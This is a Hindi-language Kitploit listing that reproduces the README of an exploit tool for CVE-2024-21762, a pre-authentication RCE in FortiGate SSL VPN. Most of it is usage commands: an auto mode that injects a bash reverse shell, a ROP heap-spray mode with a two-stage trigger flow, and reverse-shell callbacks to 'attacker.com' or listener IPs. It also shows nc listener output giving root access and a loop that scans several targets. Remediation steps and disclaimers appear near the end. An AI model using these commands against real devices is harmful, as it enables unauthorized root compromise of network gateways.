Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21762 — CVE-2024-21762 का पता लगाता है और FortiGate SSL VPN में प्री-ऑथेंटिकेशन RCE का शोषण करता है, जिसमें बेसलाइन सत्यापन, स्वचालित शोषण, ROP हीप-स्प्रे मोड और रिवर्स शेल शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/0x13-bytezer0/cve-2024-21762
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHub0x13-bytezer0/cve-2024-21762

CVE-2024-21762

CVE-2024-21762 का पता लगाता है और FortiGate SSL VPN में प्री-ऑथेंटिकेशन RCE का शोषण करता है, जिसमें बेसलाइन सत्यापन, स्वचालित शोषण, ROP हीप-स्प्रे मोड और रिवर्स शेल शामिल हैं।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21762 - FortiGate SSL VPN RCE पहचान और शोषण उपकरण

Python 3.7+ License Vulnerability: Critical

CVE-2024-21762 के लिए पहचान और शोषण उपकरण - FortiGate SSL VPN में गंभीर भेद्यता

⚠️ कानूनी चेतावनी: यह उपकरण केवल अधिकृत परीक्षण वातावरण के लिए है। अनधिकृत उपयोग अवैध है और गंभीर कानूनी परिणामों का कारण बन सकता है।

अवलोकन

CVE-2024-21762 FortiGate SSL VPN घटकों में एक गंभीर भेद्यता है जो प्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE) की अनुमति देती है। यह दोष Transfer-Encoding chunked के साथ HTTP अनुरोधों के संवेदनशील पार्सिंग में मौजूद है, जिसके परिणामस्वरूप sslvpnd घटक में out-of-bounds write होता है।

तकनीकी विवरण

गुणजानकारी
CVE IDCVE-2024-21762
भेद्यताsslvpnd में out-of-bounds write
प्रकारप्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE)
CVSS स्कोर9.8 (गंभीर)
प्रभावित घटकFortiOS SSL VPN
संवेदनशील संस्करण7.0.0-7.0.13, 7.2.0-7.2.6, 7.4.0-7.4.2

विशेषताएँ

✅ भेद्यता का पता लगाना - दोषपूर्ण अनुरोधों के माध्यम से संवेदनशील FortiGate की पहचान
✅ बेसलाइन परीक्षण - परीक्षणों से पहले सर्वर के सामान्य व्यवहार की जाँच
✅ स्वचालित मोड - स्वचालित रूप से भेद्यता का पता लगाएं और शोषण करें
✅ रिवर्स शेल - आईपी/पोर्ट कॉन्फ़िगरेशन के साथ bash रिवर्स शेल का समर्थन
✅ इनपुट सत्यापन - शोषण से पहले आईपी और पोर्ट को मान्य करें
✅ विस्तृत रिपोर्ट - सुधार अनुशंसाओं के साथ रिपोर्ट तैयार करें
✅ मजबूत त्रुटि प्रबंधन - कनेक्शन और अपवादों का सुरक्षित प्रबंधन

आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • Python लाइब्रेरी के मानक मॉड्यूल (socket, ssl, argparse, datetime, time, re)
  • लक्ष्य तक नेटवर्क पहुंच (पोर्ट 443 या कस्टम)

स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/your-username/CVE-2024-21762.git
cd CVE-2024-21762

# सिंटैक्स जांचें
python -m py_compile EXPLOIT.py

# स्क्रिप्ट चलाएं
python EXPLOIT.py -h

उपयोग

मूल उपयोग

root@kitploit:~
# सरल पहचान परीक्षण
python EXPLOIT.py 192.168.1.100

# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443

# बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --timeout 20

स्वचालित मोड (पहचान + शोषण)

root@kitploit:~
# पूर्व-कॉन्फ़िगर्ड रिवर्स शेल के साथ स्वचालित मोड
python EXPLOIT.py 192.168.1.100 --auto -li 10.0.0.5 -lp 4444

# बिना क्रेडेंशियल के स्वचालित मोड (संवादात्मक रूप से पूछता है)
python EXPLOIT.py 192.168.1.100 --auto

ROP मोड - हीप स्प्रे के साथ उन्नत शोषण

ROP मोड विशिष्ट लक्ष्यों (FortiOS 7.4.2) के लिए हीप स्प्रे के साथ दो-चरणीय शोषण लागू करता है:

root@kitploit:~
# Node.js रिवर्स शेल के साथ ROP शोषण
python EXPLOIT.py 192.168.1.100 --rop -li 10.0.0.5 -lp 4242

# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443 --rop -li attacker.com -lp 4242

# धीमे लक्ष्यों के लिए बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --rop -li 192.168.1.50 -lp 9999 --timeout 30

ROP शोषण प्रवाह:

  1. चरण 1: ROP गैजेट के साथ 1.8MB हीप स्प्रे भेजें
  2. CPU प्रक्रिया के लिए 2 सेकंड प्रतीक्षा करें
  3. चरण 2: 4137 बाइट्स के चंक के साथ OOB write ट्रिगर करें
  4. पेलोड निष्पादन के लिए 3 सेकंड प्रतीक्षा करें
  5. Node.js रिवर्स कनेक्शन स्थापित करें

अपने सुनने वाले सर्वर पर:

root@kitploit:~
# Linux/Mac/Windows netcat के साथ
nc -lnvp 4242

# अपेक्षित आउटपुट:
# listening on [any] 4242 ...
# connect to [10.0.0.5] from (UNKNOWN) [192.168.1.100] 54321
# id
# uid=0(root) gid=0(root) groups=0(root)

⚠️ महत्वपूर्ण नोट: ROP मोड FortiOS 7.4.2.F-build2571 के लिए अनुकूलित है। ROP श्रृंखला के हार्डकोडेड ऑफ़सेट के कारण अन्य संस्करण काम नहीं कर सकते हैं।

रिवर्स शेल के साथ मैन्युअल परीक्षण

root@kitploit:~
# रिवर्स शेल पेलोड भेजें
python EXPLOIT.py 192.168.1.100 -li 192.168.1.50 -lp 9999

# एकाधिक विकल्पों का संयोजन
python EXPLOIT.py -t target.com -p 8443 --auto -li attacker.com -lp 5555 --timeout 15

उपलब्ध विकल्प

root@kitploit:~
positional arguments:
  target                    परीक्षण किया जाने वाला लक्ष्य होस्टनाम या आईपी

optional arguments:
  -h, --help               यह सहायता संदेश दिखाएं
  -t, --target HOSTNAME    लक्ष्य होस्टनाम या आईपी (वैकल्पिक)
  -p, --port PORT          SSL VPN पोर्ट (डिफ़ॉल्ट: 443)
  --timeout SECONDS        टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
  -li, --lhost IP          रिवर्स शेल प्राप्त करने के लिए स्थानीय आईपी
  -lp, --lport PORT        रिवर्स शेल प्राप्त करने के लिए स्थानीय पोर्ट
  --no-baseline            बेसलाइन परीक्षण छोड़ें
  --auto                   स्वचालित मोड: पता लगाएं और शोषण करें
  --rop                    ROP मोड: हीप स्प्रे के साथ उन्नत शोषण (FortiOS 7.4.2)
  -v, --version            स्क्रिप्ट संस्करण दिखाएं

पूर्ण उपयोग उदाहरण

1. सरल पहचान

root@kitploit:~
python EXPLOIT.py 192.168.1.100

भेद्यता के मामले में अपेक्षित परिणाम:

root@kitploit:~
[+] भेद्यता परीक्षण शुरू हो रहा है...
[!] संवेदनशील पाया गया!
[!] सर्वर ने कनेक्शन अचानक समाप्त कर दिया
[!] स्थिति: संवेदनशील

2. रिवर्स शेल के साथ स्वचालित शोषण

root@kitploit:~
python EXPLOIT.py 192.168.1.100 --auto -li 192.168.1.50 -lp 4444

अपने सर्वर पर:

root@kitploit:~
# Linux/Mac
nc -lnvp 4444

# Windows
ncat -lnvp 4444

3. एकाधिक लक्ष्यों पर परीक्षण

root@kitploit:~
for target in 192.168.1.100 192.168.1.101 192.168.1.102; do
  python EXPLOIT.py $target --timeout 15
done

यह कैसे काम करता है

पहचान प्रवाह

  1. बेसलाइन परीक्षण - सामान्य व्यवहार की जांच करने के लिए सामान्य HTTP अनुरोध भेजें
  2. दोषपूर्ण अनुरोध - संवेदनशील chunked encoding के साथ दोषपूर्ण HTTP अनुरोध भेजें
  3. विश्लेषण - भेद्यता के संकेतों का पता लगाने के लिए प्रतिक्रिया का विश्लेषण करें:
    • कनेक्शन का अचानक बंद होना
    • सर्वर टाइमआउट/क्रैश
    • असामान्य TLS अलर्ट
  4. रिपोर्ट - स्थिति और अनुशंसाओं के साथ रिपोर्ट तैयार करें

शोषण प्रवाह (स्वचालित मोड)

  1. पहचान परीक्षण चलाएं
  2. यदि संवेदनशील हो, तो रिवर्स शेल पेलोड इंजेक्ट करें
  3. रिवर्स कनेक्शन की प्रतीक्षा करें
  4. अंतिम रिपोर्ट तैयार करें

भेद्यता संकेतक

उपकरण एक लक्ष्य को संवेदनशील मानता है जब निम्नलिखित व्यवहारों में से एक का पता चलता है:

  • ✓ कनेक्शन अचानक समाप्त (खाली उत्तर)
  • ✓ पेलोड भेजने के बाद टाइमआउट (सर्वर क्रैश)
  • ✓ TLS अलर्ट प्राप्त (sslvpnd क्रैश)
  • ✓ कनेक्शन रीसेट बाय पीयर

प्रभावित संस्करण

संस्करणपहचानROP मोडस्थिति
FortiOS 7.0.0 - 7.0.13✅ हाँ❌ नहीं⚠️ संवेदनशील
FortiOS 7.2.0 - 7.2.6✅ हाँ❌ नहीं⚠️ संवेदनशील
FortiOS 7.4.0 - 7.4.1✅ हाँ❌ नहीं⚠️ संवेदनशील
FortiOS 7.4.2 (build≤2571)✅ हाँ✅ हाँ⚠️ संवेदनशील
FortiOS 7.4.3+❌ नहीं❌ नहीं✅ सुधारित

सुधार

तत्काल कार्रवाई

  1. FortiOS को सुधारित संस्करण में अपडेट करें:

    • FortiOS 7.0.14+
    • FortiOS 7.2.7+
    • FortiOS 7.4.3+
  2. अस्थायी अलगाव

    • SSL VPN तक बाहरी पहुंच अक्षम करें
    • प्रशासनिक पहुंच प्रतिबंधित करें
  3. निगरानी

    • शोषण के संकेतों के लिए लॉग की समीक्षा करें
    • असामान्य क्रेडेंशियल और पहुंच की जांच करें

बाद में सत्यापन

root@kitploit:~
# FortiOS संस्करण जांचें
python EXPLOIT.py your-fortinet.com

यदि परिणाम "संवेदनशील नहीं" दिखाता है, तो पैच सफलतापूर्वक लागू हो गया है।

परियोजना संरचना

root@kitploit:~
CVE-2024-21762/
├── EXPLOIT.py          # मुख्य शोषण स्क्रिप्ट
├── README.md           # यह फ़ाइल
├── LICENSE             # MIT लाइसेंस
└── .gitignore          # Git कॉन्फ़िगरेशन

क्लास के तरीके

CVE2024_21762_Detector

तरीकाविवरण
test_vulnerability()दोषपूर्ण अनुरोध भेजकर भेद्यता का परीक्षण करें
exploit(lhost, lport)रिवर्स शेल के साथ भेद्यता का शोषण करें
test_baseline()सर्वर के सामान्य व्यवहार का परीक्षण करें
generate_report()स्थिति के साथ अंतिम रिपोर्ट तैयार करें
_create_ssl_context()पुन: प्रयोज्य SSL संदर्भ बनाएं
_create_socket_connection()सुरक्षित TLS कनेक्शन बनाएं
_close_socket(sock)सॉकेट को सुरक्षित रूप से बंद करें
_is_valid_ip(ip_str)आईपी प्रारूप मान्य करें

त्रुटि प्रबंधन

उपकरण लागू करता है:

  • ✓ मजबूत इनपुट सत्यापन
  • ✓ SSL/TLS अपवाद प्रबंधन
  • ✓ कनेक्शन में टाइमआउट
  • ✓ सॉकेट का सुरक्षित बंद होना
  • ✓ वर्णनात्मक त्रुटि संदेश

सीमाएँ

  • ⚠️ लक्ष्य तक नेटवर्क कनेक्टिविटी की आवश्यकता है
  • ⚠️ भेद्यता का पता लगाता है लेकिन सफल शोषण की गारंटी नहीं देता
  • ⚠️ रिवर्स शेल लक्ष्य वातावरण पर निर्भर करता है (bash की आवश्यकता है)
  • ⚠️ प्रतिबंधात्मक फ़ायरवॉल के साथ काम नहीं करता

FAQ

प्रश्न: क्या इसे Windows वातावरण में उपयोग किया जा सकता है?
उत्तर: हाँ, Python स्क्रिप्ट Windows पर काम करती है, लेकिन डिफ़ॉल्ट bash रिवर्स शेल काम नहीं करेगा। आपको कस्टम पेलोड की आवश्यकता होगी।

प्रश्न: मुझे कैसे पता चलेगा कि शोषण सफल रहा?
उत्तर: रिवर्स शेल के लिए सुनने वाली मशीन (nc/ncat) की जांच करें। स्क्रिप्ट प्रगति दर्शाने वाले संदेश दिखाएगी।

प्रश्न: क्या मैं इसे एकाधिक लक्ष्यों के खिलाफ उपयोग कर सकता हूं?
उत्तर: हाँ, आप आईपी सूची पर पुनरावृत्ति करने के लिए bash/PowerShell स्क्रिप्ट बना सकते हैं।

प्रश्न: सामान्य मोड और स्वचालित मोड में क्या अंतर है?
उत्तर: स्वचालित मोड यदि भेद्यता मिलती है तो स्वचालित रूप से शोषण करता है। सामान्य मोड केवल पता लगाता है।

योगदान

कोई बग मिला या सुझाव हैं? एक issue खोलें या pull request करें!

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

अस्वीकरण

यह सॉफ्टवेयर "जैसा है" अनुसंधान और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया जाता है। लेखक इसके लिए जिम्मेदार नहीं हैं:

  • अनधिकृत उपयोग से हुई क्षति
  • डेटा हानि
  • उत्पादन प्रणालियों पर प्रभाव
  • अनधिकृत उपयोग के कानूनी परिणाम

जिम्मेदारी से उपयोग करें और केवल अधिकृत वातावरण में

संदर्भ

  • Fortinet Security Advisory
  • NVD - CVE-2024-21762
  • CVSS Calculator

लेखक

साइबर सुरक्षा शिक्षा और अनुसंधान उद्देश्यों के लिए विकसित।


⚠️ याद रखें: इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत शोषण अपराध है।

टूल डाउनलोड करें